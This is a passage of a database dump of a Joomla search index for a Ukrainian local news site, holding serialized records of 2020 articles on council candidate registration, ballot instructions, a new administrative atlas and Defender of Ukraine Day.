User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:144:\"/index.php/8-novini-2/2475-zareestrovano-352-kandidati-na-34-deputskikh-mandati-u-malinsku-misku-radu-korostenskogo-rajonu-zhitomirskoji-oblasti\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2475\";s:5:\"route\";s:175:\"index.php?option=com_content&view=article&id=2475:zareestrovano-352-kandidati-na-34-deputskikh-mandati-u-malinsku-misku-radu-korostenskogo-rajonu-zhitomirskoji-oblasti&catid=8\";s:5:\"title\";s:223:\"Зареєстровано 352 кандидати на 34 депутатських мандати у Малинську міську раду Коростенського району Житомирської області\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-29 17:45:28\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-29 17:45:28\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4687,'index.php?option=com_content&view=article&id=2477','index.php?option=com_content&view=article&id=2477:tsvk-yak-pravilno-zapovniti-viborchij-byuleten&catid=8','ЦВК: Як правильно заповнити виборчий бюлетень?',' ','2020-10-11 12:50:23','d5d4c6ecc587c5eac0cf2d76082d6013',1,1,1,'*','2020-10-11 06:44:22','0000-00-00 00:00:00','2020-10-11 06:44:22','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2477\";s:5:\"alias\";s:46:\"tsvk-yak-pravilno-zapovniti-viborchij-byuleten\";s:7:\"summary\";s:296:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/55fl8T4dMmE\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-11 09:50:23\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:51:\"2477:tsvk-yak-pravilno-zapovniti-viborchij-byuleten\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:73:\"/index.php/8-novini-2/2477-tsvk-yak-pravilno-zapovniti-viborchij-byuleten\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2477\";s:5:\"route\";s:104:\"index.php?option=com_content&view=article&id=2477:tsvk-yak-pravilno-zapovniti-viborchij-byuleten&catid=8\";s:5:\"title\";s:85:\"ЦВК: Як правильно заповнити виборчий бюлетень?\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-11 06:44:22\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-11 06:44:22\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4693,'index.php?option=com_content&view=article&id=2478','index.php?option=com_content&view=article&id=2478:atlas-administrativno-teritorialnogo-ustroyu-ukrajini&catid=8','\"Атлас адміністративно-територіального устрою України\"',' Атлас містить детальну інформацію щодо нового адміністративно-територіального устрою України: назви, межі, площі, кількість населення, склад по громадах кожного нового району кожної області. Переглянути атлас можна за посиланням: https://www.minregion.gov.ua/wp-content/uploads/2020/10/atlas_novogo_atu_2020__elektronna_versiya_-2.pdf Зверніть увагу на чисельність населення в новостворених районах по областях ','2020-10-12 18:29:12','c689b266cfb22a2d935278f1e68beefc',1,1,1,'*','2020-10-12 13:53:50','0000-00-00 00:00:00','2020-10-12 13:53:50','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2478\";s:5:\"alias\";s:53:\"atlas-administrativno-teritorialnogo-ustroyu-ukrajini\";s:7:\"summary\";s:1162:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/agmi1_1.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/agmi1_1.jpg\" width=\"864\"></a></p><p><span style=\"font-size: 14px;\">Атлас містить детальну інформацію щодо нового адміністративно-територіального устрою України: назви, межі, площі, кількість населення, склад по громадах кожного нового району кожної області. Переглянути атлас можна за посиланням:&nbsp;<a href=\"https://www.minregion.gov.ua/wp-content/uploads/2020/10/atlas_novogo_atu_2020__elektronna_versiya_-2.pdf\" rel=\"nofollow\" target=\"_blank\">https://www.minregion.gov.ua/wp-content/uploads/2020/10/atlas_novogo_atu_2020__elektronna_versiya_-2.pdf</a></span><!--EndFragment--></p><p><span style=\"color: #B8312F; font-size: 16px;\">Зверніть увагу на чисельність населення в новостворених районах по областях&nbsp;</span></p><p><br></p><p><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-12 15:29:12\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"6\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:58:\"2478:atlas-administrativno-teritorialnogo-ustroyu-ukrajini\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:80:\"/index.php/8-novini-2/2478-atlas-administrativno-teritorialnogo-ustroyu-ukrajini\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2478\";s:5:\"route\";s:111:\"index.php?option=com_content&view=article&id=2478:atlas-administrativno-teritorialnogo-ustroyu-ukrajini&catid=8\";s:5:\"title\";s:102:\"\"Атлас адміністративно-територіального устрою України\"\";s:11:\"description\";s:673:\" Атлас містить детальну інформацію щодо нового адміністративно-територіального устрою України: назви, межі, площі, кількість населення, склад по громадах кожного нового району кожної області. Переглянути атлас можна за посиланням: https://www.minregion.gov.ua/wp-content/uploads/2020/10/atlas_novogo_atu_2020__elektronna_versiya_-2.pdf Зверніть увагу на чисельність населення в новостворених районах по областях \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-12 13:53:50\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-12 13:53:50\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4710,'index.php?option=com_content&view=article&id=2480','index.php?option=com_content&view=article&id=2480:14-zhovtnya-den-zakhisnika-ukrajini&catid=8','14 жовтня - День захисника України',' 14 жовтня в Україні відзначається День захисника України, який нероздільно пов’язаний із розвитком українського війська та його військових традицій. Щорічне державне свято встановлено Указом Президента України № 806 від 14 жовтня 2014 року. У цей день українці поціновують воїнів, які в різні часи обороняли і обороняють нашу незалежність і територіальну цілісність, усіх захисників України незалежно від службового становища та статі. Це свято пов’язане з розвитком війська від часів Русі. Найкращі традиції захисників минулого успадкували бійці сучасних Збройних сил України, які сьогодні відстоюють суверенітет України у війні з російським агресором. Історія цього свята має давню традицію. Покрову Пресвятої Богородиці відзначали козаки, за що свято отримало другу назву – Козацька Покрова. Українське військо 1917–1921 років зберігало козацькі військові традиції в назвах військових частин, структурі, прапорах, одностроях тощо. 14 жовтня 1942 року вважається символічним днем утворення Української повстанської армії. З початком сучасної російсько-української війнимайже чотириста тисяч українців взяли зброю до рук у лавах Збройних Сил, Національної гвардії, правоохоронних органів і добровольчих формувань, щоб зупинити агресію Російської Федерації та відстояти незалежність України. Наразі Українська армія активно модернізується, позбувається радянської спадщини та відновлює українські військові традиції У День захисника України ми вшановуємо сучасних захисників України та героїв різних епох нашої історії. Це день, коли необхідно згадати загиблих вояків і подякувати всім громадянам, які присвятили життя захисту Української держави. Звільнити українську територію від окупанта без збройної відсічі неможливо. Тож боєздатне військо і внутрішня консолідація суспільства на основі спільних цінностей та поваги до власної держави забезпечать захист і відновлення територіальної цілісності країни. ','2020-10-14 09:09:04','12283289242cad0c787fa6085f8995b2',1,1,1,'*','2020-10-14 05:46:50','0000-00-00 00:00:00','2020-10-14 05:46:50','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2480\";s:5:\"alias\";s:35:\"14-zhovtnya-den-zakhisnika-ukrajini\";s:7:\"summary\";s:4619:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/army.jpg\"><img alt=\"\" class=\"fr-fin fr-dib\" src=\"https://malehus.in.ua/images/stories/army.jpg\" width=\"805\"></a></p><p>&nbsp;&nbsp;&nbsp;&nbsp;14 жовтня в Україні  відзначається День захисника України, який нероздільно пов’язаний із розвитком  українського війська та його військових традицій. Щорічне державне свято встановлено Указом Президента  України № 806 від 14 жовтня 2014 року.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;У цей день українці поціновують воїнів, які  в різні часи обороняли і обороняють нашу незалежність і територіальну  цілісність, усіх захисників України незалежно від службового становища та  статі.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;Це свято пов’язане з розвитком війська від  часів Русі. Найкращі традиції захисників минулого успадкували бійці сучасних  Збройних сил України, які сьогодні відстоюють суверенітет України у війні з  російським агресором.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;Історія  цього свята має давню традицію. Покрову Пресвятої Богородиці відзначали козаки, за що  свято отримало другу назву – Козацька Покрова. Українське військо 1917–1921  років зберігало козацькі військові традиції в назвах військових частин,  структурі, прапорах, одностроях тощо.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;14 жовтня 1942 року вважається символічним  днем утворення Української повстанської армії.</p><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/P1w2Qd8wsCQ\" width=\"560\"></iframe></span></p><p>&nbsp;&nbsp;&nbsp;&nbsp;З початком сучасної російсько-української  війни майже чотириста тисяч українців взяли зброю до рук у лавах Збройних Сил, Національної  гвардії, правоохоронних органів і добровольчих формувань, щоб зупинити агресію  Російської Федерації та відстояти незалежність України.</p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/dFBvXpFnWcc\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span><p>&nbsp;&nbsp;&nbsp;&nbsp;Наразі Українська армія активно модернізується,  позбувається радянської спадщини та відновлює українські військові традиції</p><p>&nbsp;&nbsp;&nbsp;&nbsp;У  День захисника України ми вшановуємо сучасних захисників України та героїв  різних епох нашої історії. Це день, коли необхідно згадати загиблих вояків і  подякувати всім громадянам, які присвятили життя захисту Української держави.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;<span style=\"color: #28324E;\">Звільнити  українську територію від окупанта без збройної відсічі неможливо. Тож боєздатне  військо і внутрішня консолідація суспільства на основі спільних цінностей та  поваги до власної держави забезпечать захист і відновлення територіальної  цілісності країни.</span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-14 06:09:04\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\